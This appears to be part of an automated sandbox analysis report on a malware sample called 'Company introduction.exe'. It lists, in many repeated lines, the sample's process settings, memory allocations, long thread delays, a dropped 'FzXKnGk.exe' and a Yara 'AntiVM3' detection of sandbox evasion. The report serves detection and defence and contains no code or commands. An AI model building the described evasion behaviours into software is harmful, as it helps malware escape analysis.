                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 8680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 7C30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 9680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: A680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: AB20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: BB20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: CB20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 15F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: D10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: D10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: 7340000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: 8340000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: 84E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: 94E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: 9AE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: AAE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: 1830000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: 3340000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMemory allocated: 3110000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599421Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599306Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599202Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599084Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598953Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598844Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598734Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598625Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598516Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598406Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598049Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597366Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597140Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597030Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596016Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595358Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595141Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595016Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 594891Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 594562Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 594453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599871
